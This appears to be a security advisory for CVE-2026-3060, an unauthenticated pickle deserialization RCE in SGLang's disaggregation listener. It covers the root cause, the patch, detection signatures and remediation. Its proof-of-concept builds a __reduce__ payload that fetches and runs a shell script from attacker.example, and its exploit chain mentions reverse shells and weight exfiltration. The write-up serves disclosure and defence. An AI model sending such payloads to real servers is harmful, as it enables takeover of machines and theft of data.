CVE-2026-3060: Unauthenticated RCE in SGLang's Disaggregation Module via pickle.loads()

SGLang's encoder parallel disaggregation system deserializes untrusted network data with pickle.loads() and no authentication, enabling unauthenticated remote code execution against any exposed inference server.

Plain English Version

A serious security flaw has been discovered in SGLang, a popular artificial intelligence software tool. The vulnerability allows attackers to take complete control of computers running the software without needing any password or permission.

Here's what's happening: SGLang uses a feature called "pickle" to read data from other computers. Think of pickle like a way to package information so it can be sent over the internet. The problem is that SGLang accepts this packaged data without checking who sent it or whether it's trustworthy. It's like accepting a package at your front door without verifying it actually came from someone you know.

An attacker can send specially crafted malicious data to SGLang, and the software will automatically execute whatever instructions are hidden inside. This gives the attacker complete control — they could steal data, install ransomware, or use your computer to attack others.

Who's at risk? Anyone running SGLang with its "disaggregation" feature turned on (a setting that spreads AI work across several machines), particularly companies and researchers using it for AI work. If SGLang is exposed to the internet or runs on a shared network, the danger is even greater. University labs and AI development teams should be especially concerned.

The good news is that security researchers haven't found evidence of attackers actively exploiting this yet, so there's still time to fix it.

If you or your organization uses SGLang, act now. First, check whether you are running it and update to a version that includes the fix. Second, do not expose SGLang directly to the internet; keep it on protected internal networks only. Third, monitor any computers running SGLang for suspicious activity, and consider temporarily disabling the software if you cannot update right away.



Vulnerability Overview

CVE-2026-3060 is a CVSS 9.8 critical unauthenticated remote code execution vulnerability in SGLang's disaggregation subsystem. The encoder parallel disaggregation module accepts arbitrary network connections and passes attacker-controlled byte streams directly to pickle.loads() with no authentication, no HMAC validation, and no type restrictions. Any SGLang process whose disaggregation listener is reachable over the network can be fully compromised.

SGLang is a high-performance inference framework widely deployed for LLM serving. The disaggregation feature splits prefill and decode phases across separate worker nodes. This performance optimization introduces a cross-node RPC channel that, prior to the patch, was entirely unauthenticated and deserialized arbitrary Python objects on receipt, running any code embedded in them.

Root cause: The disaggregation bootstrap receiver calls pickle.loads() on raw socket data from unauthenticated remote peers with no sandboxing, type restriction, or integrity verification.

Affected Component

The vulnerable code lives in SGLang's disaggregation module, specifically the encoder parallel bootstrap and transfer path under python/sglang/srt/disaggregation/. Both the base decode.py / prefill.py transfer managers and the MooncakeTransferEngine backend are affected. The listener binds to a configurable port that is exposed to the network during multi-node inference deployments, and no credentials are required to reach it.

Root Cause Analysis

The disaggregation bootstrap handler receives connection metadata and KV-cache transfer descriptors from remote prefill workers. The original implementation serializes these descriptors with pickle for convenience — a common Python antipattern that becomes catastrophic when the receiving end is network-accessible.


# python/sglang/srt/disaggregation/decode.py (VULNERABLE)

import pickle
import socket


def _recv_exactly(sock: socket.socket, n: int) -> bytes:
    """Read exactly n bytes from sock, or raise if the peer disconnects."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer disconnected")
        buf += chunk
    return buf


class DisaggregationDecodeTransferManager:

    def _bootstrap_recv_loop(self, conn: socket.socket):
        """Receive bootstrap metadata from prefill peer."""
        # BUG: raw socket data from unauthenticated remote peer
        header_bytes = _recv_exactly(conn, 4)
        payload_len  = int.from_bytes(header_bytes, "big")

        # BUG: attacker controls payload_len (no upper bound) and payload content
        payload = _recv_exactly(conn, payload_len)

        # BUG: pickle.loads() on fully attacker-controlled bytes
        #      executes arbitrary Python via the __reduce__ / REDUCE mechanism
        meta = pickle.loads(payload)   # <-- CVE-2026-3060

        self._handle_bootstrap_meta(meta)

The __reduce__ protocol lets whoever produces a pickle name an arbitrary importable callable and its arguments, and the consumer invokes that callable during deserialization. This is not a logic bug or an edge case. It is the intended behavior of pickle, used here on data that was never supposed to come from an adversary.
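A harmless way to watch the receiver perform the call, as a minimal sketch: the Payload class is illustrative, and the builtin sorted stands in for os.system so that nothing dangerous runs.

```python
import pickle


class Payload:
    """Attacker-side class: its __reduce__ decides what the *receiver* calls."""

    def __reduce__(self):
        # (callable, args) is recorded in the stream as a global reference
        # plus an argument tuple. sorted is a harmless stand-in for os.system.
        return (sorted, ("pickle",))


blob = pickle.dumps(Payload())

# Receiver side: nothing here references Payload, yet loads() imports
# builtins.sorted and calls sorted("pickle") while deserializing.
result = pickle.loads(blob)
print(result)  # ['c', 'e', 'i', 'k', 'l', 'p']
```

The stream contains only the names builtins and sorted, never Payload, which is why the receiver needs no matching class definition for the call to fire.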


# Minimal PoC payload construction — attacker side
import pickle, os, struct, socket

class RCEPayload:
    def __reduce__(self):
        # pickle __reduce__: (callable, args) -> callable(*args) on loads()
        return (os.system, ("curl https://attacker.example/shell.sh | bash",))

payload  = pickle.dumps(RCEPayload())
header   = struct.pack(">I", len(payload))
frame    = header + payload

s = socket.create_connection(("victim-inference-node", 8998))
s.sendall(frame)
s.close()
# victim node executes os.system() as the sglang worker process user

No authentication token is checked before pickle.loads() is reached. The four-byte length prefix is the only gate, and it serves framing, not security.

Exploitation Mechanics


EXPLOIT CHAIN — CVE-2026-3060:

1. Attacker identifies an SGLang inference node with disaggregation enabled.
   Discovery: scan for default port (commonly 8998–9000 range) or read
   deployment configs leaked via model metadata endpoints.

2. Establish a raw TCP connection to the disaggregation bootstrap listener.
   No TLS, no authentication challenge issued by server.

3. Construct a malicious pickle payload using the __reduce__ protocol:
     RCEPayload.__reduce__() -> (os.system, ("cmd",))
   or, for an interactive reverse shell, the same tuple with a command that
   connects back to an attacker-controlled listener.

4. Prepend a 4-byte big-endian length header matching len(pickle.dumps(...)).

5. Send the 4-byte header followed immediately by the pickle frame.

6. Server _bootstrap_recv_loop() reads header, reads exactly payload_len bytes,
   calls pickle.loads(payload) — __reduce__ fires synchronously.

7. Arbitrary code executes in the worker process context.
   Typical deployment: runs as root or a service account with GPU/model access.

8. From model worker context: exfiltrate weights, pivot to other cluster nodes
   via shared NVLink/RDMA fabric, or persist via CUDA poisoning.

The exploit is completely pre-authentication and requires only network reachability. In cloud deployments using SGLang's disaggregation feature, the bootstrap port is often opened between nodes in the same VPC security group, so an attacker needs a foothold on only one node in that group.

Memory Layout

Unlike memory-corruption CVEs, the exploit surface here is the Python object graph rather than heap layout. However, understanding what pickle materializes is useful for detection:


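PICKLE OPCODE STREAM (PoC payload above, pickle protocol 4, Linux host; annotated):

offset  opcode  arg             meaning
------  ------  ---             -------
0x00    \x80    \x04            PROTO 4 (the default protocol as of Python 3.8)
0x02    \x95    [8-byte len]    FRAME header (little-endian frame length)
0x0b    \x8c    \x05            SHORT_BINUNICODE len=5
0x0d    "posix"                 module name (os.system is posix.system on Linux,
                                nt.system on Windows)
0x12    \x94                    MEMOIZE
0x13    \x8c    \x06            SHORT_BINUNICODE len=6
0x15    "system"                attribute name
0x1b    \x94                    MEMOIZE
0x1c    \x93                    STACK_GLOBAL -> import posix, fetch .system
0x1d    \x94                    MEMOIZE
0x1e    \x8c    \x2d            SHORT_BINUNICODE len=45
0x20    "curl https://..."      the 45-byte shell command from the PoC
0x4d    \x94                    MEMOIZE
0x4e    \x85                    TUPLE1 -> args = ("curl ...",)
0x4f    \x94                    MEMOIZE
0x50    \x52                    REDUCE -> calls os.system(*args)
0x51    \x94                    MEMOIZE
0x52    \x2e                    STOP

Python interpreter state during pickle.loads():
  __reduce__ never runs on the victim; it ran on the attacker side inside
  pickle.dumps() and was compiled into the STACK_GLOBAL + REDUCE opcodes
  STACK_GLOBAL -> Unpickler.find_class("posix", "system") imports the module
  REDUCE       -> load_reduce pops the args tuple and the callable
  call stack: pickle.loads -> load_reduce -> callable(*args)
              = os.system("curl https://attacker.example/shell.sh | bash")
  NO sandbox, NO restricted builtins, full interpreter access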
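Because the import and the call are explicit opcodes, a captured payload can be inspected without executing it. The standard library's pickletools module parses the stream (pickletools.dis prints a listing much like the one above, and pickletools.genops yields one opcode at a time). A minimal sketch, where risky_opcodes, the Evil class, and the chosen opcode set are illustrative assumptions rather than any SGLang or IDS API:

```python
import pickle
import pickletools

# Opcodes that import a global or call/construct an object during loads().
RISKY_OPCODES = {
    "GLOBAL", "STACK_GLOBAL",        # import module.attr
    "REDUCE", "INST", "OBJ",         # call a callable or instantiate a class
    "NEWOBJ", "NEWOBJ_EX",           # cls.__new__(cls, *args)
}


def risky_opcodes(data: bytes) -> list[tuple[int, str]]:
    """List (offset, opcode name) for risky opcodes, without unpickling."""
    hits = []
    # genops only parses the stream; it never imports or calls anything.
    for opcode, _arg, pos in pickletools.genops(data):
        if opcode.name in RISKY_OPCODES:
            hits.append((pos, opcode.name))
    return hits


class Evil:
    def __reduce__(self):
        return (print, ("would run on loads()",))


benign = pickle.dumps({"request_id": "r1", "kv_indices": [1, 2]}, protocol=4)
malicious = pickle.dumps(Evil(), protocol=4)  # dumps() only; never loaded

print(risky_opcodes(benign))                            # []
print([name for _, name in risky_opcodes(malicious)])  # ['STACK_GLOBAL', 'REDUCE']
```

A plain dict of strings and integers needs none of these opcodes, so any hit in traffic that should carry only metadata is a strong signal.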

Patch Analysis

The fix applied in PR #20904 replaces pickle serialization with a structured, schema-validated format. The bootstrap metadata is now exchanged as JSON (or a similarly safe format) with explicit field validation, and critically, no arbitrary object instantiation is possible on the receiving end.


# BEFORE (vulnerable) — python/sglang/srt/disaggregation/decode.py:
import pickle

def _bootstrap_recv_loop(self, conn):
    header_bytes = _recv_exactly(conn, 4)
    payload_len  = int.from_bytes(header_bytes, "big")
    payload      = _recv_exactly(conn, payload_len)
    meta         = pickle.loads(payload)          # arbitrary code execution
    self._handle_bootstrap_meta(meta)


# AFTER (patched, PR #20904): explicit schema deserialization
import dataclasses
import json

MAX_BOOTSTRAP_FRAME = 4 * 1024 * 1024  # 4 MiB upper bound per bootstrap frame

# BootstrapMeta is now a plain dataclass: no __reduce__, no callables
@dataclasses.dataclass
class BootstrapMeta:
    request_id:    str
    kv_indices:    list[int]
    aux_data:      dict[str, int]

def _bootstrap_recv_loop(self, conn):
    header_bytes = _recv_exactly(conn, 4)
    payload_len  = int.from_bytes(header_bytes, "big")

    # BUG FIXED: enforce a maximum frame size before allocation
    if payload_len > MAX_BOOTSTRAP_FRAME:
        raise ValueError(f"oversized bootstrap frame: {payload_len}")

    payload = _recv_exactly(conn, payload_len)

    # SAFE: json.loads cannot instantiate arbitrary Python objects
    raw  = json.loads(payload.decode("utf-8"))

    # SAFE: explicit field extraction with type coercion; a missing key raises
    #       KeyError, a non-object payload or unconvertible value raises
    #       TypeError/ValueError, and extra keys are simply ignored
    meta = BootstrapMeta(
        request_id = str(raw["request_id"]),
        kv_indices = [int(x) for x in raw["kv_indices"]],
        aux_data   = {str(k): int(v) for k, v in raw.get("aux", {}).items()},
    )
    self._handle_bootstrap_meta(meta)

The patch also adds MAX_BOOTSTRAP_FRAME = 4 * 1024 * 1024 (4 MiB) to prevent memory exhaustion via an oversized payload_len, a secondary issue the original code also exposed. Authentication between prefill and decode workers, via a pre-shared token checked before any deserialization, is added as a separate layer in the same PR.
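The source does not show how PR #20904 implements the token check. One common way to realize "authenticate before deserializing" is an HMAC tag over each payload, verified in constant time before parsing; this swaps in HMAC-SHA256 in place of a bare token, which also binds the key to each frame's contents. A hypothetical sketch: sign_payload, verify_and_parse, the tag-prefixed layout, and the example key are assumptions, not SGLang's wire format. The resulting body would then be wrapped in the existing 4-byte length frame.

```python
import hashlib
import hmac
import json

TAG_LEN = hashlib.sha256().digest_size  # 32-byte HMAC-SHA256 tag


def sign_payload(key: bytes, payload: bytes) -> bytes:
    """Sender side: prefix the payload with an HMAC-SHA256 tag."""
    return hmac.new(key, payload, hashlib.sha256).digest() + payload


def verify_and_parse(key: bytes, body: bytes) -> dict:
    """Receiver side: authenticate first, parse (as JSON, never pickle) second."""
    if len(body) < TAG_LEN:
        raise ValueError("frame too short to carry an authentication tag")
    tag, payload = body[:TAG_LEN], body[TAG_LEN:]
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    # compare_digest avoids leaking how many tag bytes matched via timing.
    if not hmac.compare_digest(tag, expected):
        raise PermissionError("bootstrap frame failed authentication")
    raw = json.loads(payload.decode("utf-8"))
    if not isinstance(raw, dict):
        raise ValueError("bootstrap metadata must be a JSON object")
    return raw


# Usage: both workers hold the same (hypothetical) shared key.
key = b"example-shared-key"
body = sign_payload(key, json.dumps({"request_id": "r1", "kv_indices": [3, 4]}).encode())
print(verify_and_parse(key, body)["kv_indices"])  # [3, 4]
```

An HMAC alone does not stop replay of a captured frame; rejecting reused request IDs or adding a nonce would be needed for that.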

Detection and Indicators

Because exploitation is a single TCP exchange with no multi-stage handshake, detection requires either network capture or process-level telemetry:


NETWORK IOCs:
  - Inbound TCP to disaggregation port from unexpected source IPs
  - Bootstrap frames where payload does not begin with valid JSON ({)
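  - Frames whose payload begins with the pickle PROTO opcode \x80 plus a
    protocol byte \x02-\x05, e.g. \x80\x04\x95 (PROTO 4 + FRAME) or
    \x80\x02 (PROTO 2); these are never legitimate after patching
    (protocol 0/1 pickles carry no \x80 prefix and fall under the JSON check)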

PROCESS IOCs:
  - sglang worker spawning sh, bash, curl, wget as child processes
  - Unexpected outbound connections from the inference worker PID
  - /proc/<pid>/fd showing new network sockets post-bootstrap

SNORT/SURICATA SIGNATURE (bootstrap port, pickle magic):
  alert tcp any any -> $SGLANG_NODES $DISAGG_PORT (
    msg:"CVE-2026-3060 SGLang pickle RCE attempt";
    content:"|80 04 95|"; offset:4; depth:3;
    sid:2026306001; rev:1;
  )
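To triage reassembled captures offline, the JSON-versus-PROTO distinction from the IOCs above can be checked per frame. A minimal sketch, assuming each capture is one frame of a 4-byte big-endian length header plus payload (the framing used by the vulnerable code); classify_bootstrap_frame and make_frame are hypothetical helpers:

```python
import json
import pickle
import struct


def classify_bootstrap_frame(frame: bytes) -> str:
    """Classify one reassembled frame: 4-byte big-endian length + payload."""
    if len(frame) < 4:
        return "truncated"
    (declared_len,) = struct.unpack(">I", frame[:4])
    payload = frame[4:4 + declared_len]
    if len(payload) < declared_len:
        return "truncated"
    # Protocols 2+ start with the PROTO opcode 0x80 and a protocol byte.
    if len(payload) >= 2 and payload[0] == 0x80 and 2 <= payload[1] <= 5:
        return f"pickle-proto{payload[1]}"
    try:
        json.loads(payload.decode("utf-8"))
        return "json"
    except (UnicodeDecodeError, json.JSONDecodeError):
        # Protocol 0/1 pickles have no PROTO prefix and end up here.
        return "unknown"


def make_frame(payload: bytes) -> bytes:
    """Build a test frame with the same 4-byte big-endian length prefix."""
    return struct.pack(">I", len(payload)) + payload


print(classify_bootstrap_frame(make_frame(b'{"request_id": "r1"}')))            # json
print(classify_bootstrap_frame(make_frame(pickle.dumps({"a": 1}, protocol=4))))  # pickle-proto4
```

Anything other than "json" on a patched deployment deserves a closer look.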

Remediation

Immediate: Apply the patch from PR #20904. If patching is not immediately possible, firewall the disaggregation port to known prefill-worker IPs only. Do not expose it to the open internet or untrusted VPC peers under any circumstances.
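After firewalling, it is worth confirming from a host that should not have access that the port is actually closed to it. A minimal sketch; port_reachable is a hypothetical helper, not an SGLang tool:

```python
import socket


def port_reachable(host: str, port: int, timeout: float = 2.0) -> bool:
    """True if this machine can complete a TCP handshake with host:port."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # Covers refused connections, timeouts, and DNS failures alike.
        return False
```

Run it from a host outside the allowed prefill-worker set, for example port_reachable("decode-node.example", 8998), where the hostname is a placeholder and 8998 is the port used in the PoC; substitute your deployment's configured disaggregation port. A True result there means the firewall rule is not doing its job.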

Structural: Audit all other inter-node communication channels in SGLang for additional pickle usage. Treat the pattern pickle.loads(network_data) as a critical finding in any code review. Run grep -rnE "pickle\.loads?\(|recv_pyobj" python/sglang/srt/ against your deployed version to identify remaining instances before upgrading; pyzmq's recv_pyobj() also unpickles whatever it receives, so searching for pickle.loads alone can miss sinks.
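A single grep pattern can miss aliased imports such as from pickle import loads as L. As a sketch of a somewhat more robust audit, the following walks the Python AST with the standard library's ast module. The function names and the set of flagged calls (pickle.load/loads/Unpickler plus pyzmq's recv_pyobj) are assumptions of this sketch, not an existing tool.

```python
import ast
import pathlib

PICKLE_MODULES = {"pickle", "_pickle"}
SINK_FUNCS = {"load", "loads", "Unpickler"}


def scan_source(source: str, filename: str = "<string>") -> list[tuple[int, str]]:
    """Return sorted (line, call) pairs for calls that deserialize pickle data."""
    tree = ast.parse(source, filename=filename)
    module_aliases: set[str] = set()  # "pickle", or "pk" from "import pickle as pk"
    func_aliases: set[str] = set()    # "L" from "from pickle import loads as L"
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name in PICKLE_MODULES:
                    module_aliases.add(alias.asname or alias.name)
        elif isinstance(node, ast.ImportFrom) and node.module in PICKLE_MODULES:
            for alias in node.names:
                if alias.name in SINK_FUNCS:
                    func_aliases.add(alias.asname or alias.name)

    hits = []
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        if isinstance(func, ast.Attribute) and func.attr == "recv_pyobj":
            # pyzmq's Socket.recv_pyobj() unpickles the received message.
            hits.append((node.lineno, "recv_pyobj"))
        elif (isinstance(func, ast.Attribute) and func.attr in SINK_FUNCS
              and isinstance(func.value, ast.Name)
              and func.value.id in module_aliases):
            hits.append((node.lineno, f"{func.value.id}.{func.attr}"))
        elif isinstance(func, ast.Name) and func.id in func_aliases:
            hits.append((node.lineno, func.id))
    return sorted(hits)


def find_pickle_sinks(root: str) -> list[tuple[str, int, str]]:
    """Scan every .py file under root; skip files that fail to parse."""
    findings = []
    for path in sorted(pathlib.Path(root).rglob("*.py")):
        try:
            hits = scan_source(path.read_text(encoding="utf-8"), str(path))
        except (SyntaxError, UnicodeDecodeError, ValueError):
            continue
        findings.extend((str(path), line, call) for line, call in hits)
    return findings
```

Calling find_pickle_sinks("python/sglang/srt") on a checkout lists each file, line, and call. It remains a heuristic: it does not follow dynamic imports or other libraries that unpickle internally, so treat an empty result as "nothing obvious", not "safe".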

Defense in depth: Run inference workers as a dedicated low-privilege service account. Apply seccomp profiles that restrict execve on worker processes; this blocks shell-spawning payloads such as the PoC's os.system call, although an attacker still gets arbitrary Python execution inside the worker (reading model files, opening sockets). Network-segment prefill and decode nodes into a dedicated security group with no egress to the internet.